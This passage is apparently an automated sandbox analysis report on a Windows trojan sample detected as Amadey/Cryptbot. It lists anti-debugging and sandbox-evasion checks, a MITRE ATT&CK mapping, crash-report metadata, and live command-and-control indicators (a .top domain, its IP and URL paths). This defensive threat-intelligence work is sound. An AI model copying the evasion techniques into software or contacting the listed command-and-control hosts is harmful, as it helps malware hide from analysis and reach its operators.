Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 28PCC9oa8s.exe, 00000000.00000003.1336590433.0000000001481000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: Amcache.hve.5.drBinary or memory string: VMware20,1
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 28PCC9oa8s.exe, 00000000.00000002.1711627852.00000000008D1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\28PCC9oa8s.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\28PCC9oa8s.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\28PCC9oa8s.exeCode function: 0_2_06DA0142 Start: 06DA0381 End: 06DA01C30_2_06DA0142
Source: C:\Users\user\Desktop\28PCC9oa8s.exeCode function: 0_2_06DA0123 Start: 06DA0381 End: 06DA01C30_2_06DA0123
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\28PCC9oa8s.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\28PCC9oa8s.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\28PCC9oa8s.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\28PCC9oa8s.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\28PCC9oa8s.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\28PCC9oa8s.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\28PCC9oa8s.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\28PCC9oa8s.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile opened: NTICE
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile opened: SICE
Source: C:\Users\user\Desktop\28PCC9oa8s.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\28PCC9oa8s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeCode function: 0_2_06DA08F3 rdtsc 0_2_06DA08F3
Source: 28PCC9oa8s.exe, 28PCC9oa8s.exe, 00000000.00000002.1711627852.00000000008D1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: xProgram Manager
Source: C:\Users\user\Desktop\28PCC9oa8s.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\28PCC9oa8s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
Source: 28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Leaks process information
Source: global trafficTCP traffic: 192.168.2.7:49703 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.7:49704 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.7:49710 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		2
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information		Security Account Manager12
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets214
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
28PCC9oa8s.exe66%ReversingLabsWin32.Trojan.Amadey
28PCC9oa8s.exe100%AviraTR/Crypt.TPM.Gen
28PCC9oa8s.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5vt.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.html28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtd28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://httpbin.org/ipbefore28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                https://curl.se/docs/http-cookies.html28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  http://upx.sf.netAmcache.hve.5.drfalse
                    		high
                    http://home.fivetk5vt.top/hLfzX28PCC9oa8s.exe, 00000000.00000002.1714643297.0000000006E70000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtO28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmpfalse
                        		unknown
                        https://curl.se/docs/alt-svc.html28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://.css28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpfalse
                            		high
                            http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ173451474535a128PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://.jpg28PCC9oa8s.exe, 00000000.00000002.1711165347.00000000005E0000.00000040.00000001.01000000.00000003.sdmp, 28PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745lse28PCC9oa8s.exe, 00000000.00000002.1712590265.000000000144E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1728PCC9oa8s.exe, 00000000.00000003.1308418822.0000000006FEF000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high
                                    http://home.fivetk5vt.top/hLfzXdA28PCC9oa8s.exe, 00000000.00000002.1714643297.0000000006E70000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      185.121.15.192
                                      		home.fivetk5vt.topSpain
                                      		207046REDSERVICIOESfalse
                                      98.85.100.80
                                      		httpbin.orgUnited States
                                      		11351TWC-11351-NORTHEASTUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1578970
                                      Start date and time:2024-12-20 17:14:12 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 34s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:11
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:28PCC9oa8s.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:8a549f15d1418fb4207aadb4ba813a36.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@2/5@10/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.168.117.173, 13.107.246.63, 20.190.147.8, 20.12.23.50
                                      • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: 28PCC9oa8s.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      11:15:18API Interceptor3x Sleep call for process: 28PCC9oa8s.exe modified
                                      12:55:53API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      185.121.15.192HHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                      GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      • home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
                                      iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                      • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                      98.85.100.80fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                        iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                          S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                            QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                              EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                  icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                    5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                      u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                        HZhObFuFNe.exeGet hashmaliciousUnknownBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          httpbin.orgHHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 34.226.108.155
                                                          GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 34.226.108.155
                                                          fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                          • 34.226.108.155
                                                          iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                                          • 34.226.108.155
                                                          QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                                          • 98.85.100.80
                                                          WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                                          • 34.226.108.155
                                                          EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          home.fivetk5vt.topHHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.121.15.192
                                                          GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.121.15.192
                                                          file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                          • 176.53.146.212
                                                          Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                          • 176.53.146.212
                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                          • 176.53.146.212
                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                          • 176.53.146.212
                                                          s3hvuz3XS0.exeGet hashmaliciousCryptbotBrowse
                                                          • 176.53.146.212
                                                          65AcuGF7W7.exeGet hashmaliciousCryptbotBrowse
                                                          • 176.53.146.212
                                                          9nYVfFos77.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 176.53.146.212
                                                          ovQrwYAhbq.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 176.53.146.212

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          TWC-11351-NORTHEASTUSfnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                                          • 98.85.100.80
                                                          EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                          • 98.85.100.80
                                                          icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 98.85.100.80
                                                          5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          u16wYpJpGE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 98.85.100.80
                                                          HZhObFuFNe.exeGet hashmaliciousUnknownBrowse
                                                          • 98.85.100.80
                                                          REDSERVICIOESHHFgVU1HGu.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.121.15.192
                                                          GxSEtDSBuK.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.121.15.192
                                                          iuO4kwUi17.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          nojxbVm8i4.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          QnYodX3dYf.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          WP6s7cCLzr.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          h9CywWZk71.exeGet hashmaliciousCryptbotBrowse
                                                          • 185.121.15.192
                                                          icDcFzyHRy.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                          • 185.121.15.192
                                                          5ZH9uXmzGP.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192
                                                          2M43DSi2cx.exeGet hashmaliciousUnknownBrowse
                                                          • 185.121.15.192

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_28PCC9oa8s.exe_a82274689f8358484cc748f987ffe3443b81a581_74b57fa0_7905abf1-0893-42d5-8a51-8f0d90397947\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9428709213114754
                                                          Encrypted:false
                                                          SSDEEP:96:Q5FC1z3sThGGhpJfZQXIDcQvc6QcEVcw3cE/93V+HbHg/8BRTf3Oy1oVazW0dPto:U4J3Z0BU/gju0ZrPMtwzuiFKZ24IO8i
                                                          MD5:C04C0EDD32BDA8E63E35EBB2AECA2AA1
                                                          SHA1:19D0C371D633B6BA1ED5FB2AD9F1F53CCFEFB0A4
                                                          SHA-256:8C328C48FC48B9CED6CC15CDBB80B11966DDC00CB434C0AB944E9C4E70D5FDBF
                                                          SHA-512:01E9114B44629A5F75A25023085A97575E272F280824ED3A13C5C44EB9A76A58643456A667901745F76D2B62C0512D6920A49C1E41C4AAECF3F609DCD529053C
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.8.4.9.2.4.4.8.1.3.3.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.8.4.9.2.5.5.2.8.2.1.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.9.0.5.a.b.f.1.-.0.8.9.3.-.4.2.d.5.-.8.a.5.1.-.8.f.0.d.9.0.3.9.7.9.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.c.a.3.d.d.a.-.2.6.9.1.-.4.6.3.9.-.b.7.9.8.-.c.f.7.2.8.9.3.8.3.e.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.8.P.C.C.9.o.a.8.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.f.8.-.0.0.0.1.-.0.0.1.4.-.e.8.e.b.-.e.c.5.8.f.a.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.0.e.f.d.b.9.1.1.c.0.f.c.9.0.b.2.a.1.0.9.0.9.5.7.8.2.8.6.b.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.9.0.1.9.f.5.3.2.a.c.c.0.0.0.9.6.0.5.5.7.8.8.d.1.2.1.2.8.4.2.e.8.b.e.c.3.5.6.2.7.!.2.8.P.C.C.9.o.a.8.s...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC07D.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 15 streams, Fri Dec 20 16:15:24 2024, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):216324
                                                          Entropy (8bit):1.3579718457104457
                                                          Encrypted:false
                                                          SSDEEP:768:8HhbixhwwEqxZBQ5ZoSEoO8kg7NDY6TXo8PJZhAW1fs1Vq4:Chexh/BSZHEovkg7NDYGo8PJZhAb1Vv
                                                          MD5:276B6FFE3A924043F3FD56D9958B6C50
                                                          SHA1:C946B5D9D98E72051CC4AAF20742B80BF57B62F6
                                                          SHA-256:AEB9E99579ECD863FE2D920B9BC365BB58465367076727C997B408CE03A05C0D
                                                          SHA-512:46F8FA818C7EF1BE8F24CD07C51E5BA8424609C3A4E61D8D09A2ADC4A0D711F00F9DAD95C7976065BE79E3EB34CBBA01897C36F75079B7052C7DD71484692AE9
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:MDMP..a..... .........eg............t...........D................ ...........}..........`.......8...........T............,..l ..........P!..........<#..............................................................................eJ.......#......GenuineIntel............T.............eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1A6.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8356
                                                          Entropy (8bit):3.6962627655413716
                                                          Encrypted:false
                                                          SSDEEP:192:R6l7wVeJb+6fd16YNKSUiUgmfPbZpri89b6Asfuem:R6lXJS6ff6YgSUiUgmfPb/6TfO
                                                          MD5:3D5FC475AB91AD61E2DFC704F2C1DB82
                                                          SHA1:537428519B45771525DD81B370EC706E1C071C0E
                                                          SHA-256:F76E2F5957E2D542D265E165DC56EF50AA8A9E220334E4C1883B927EE18CCD23
                                                          SHA-512:3D714E0E711915C25A74BB25114BC91E01A6C8218D2025F731E0E7CFC6D46BEE5841A1C1D33022030D217A46B647C18663724A1720F6574282D935D44AEA814A
                                                          Malicious:false
                                                          Reputation:low
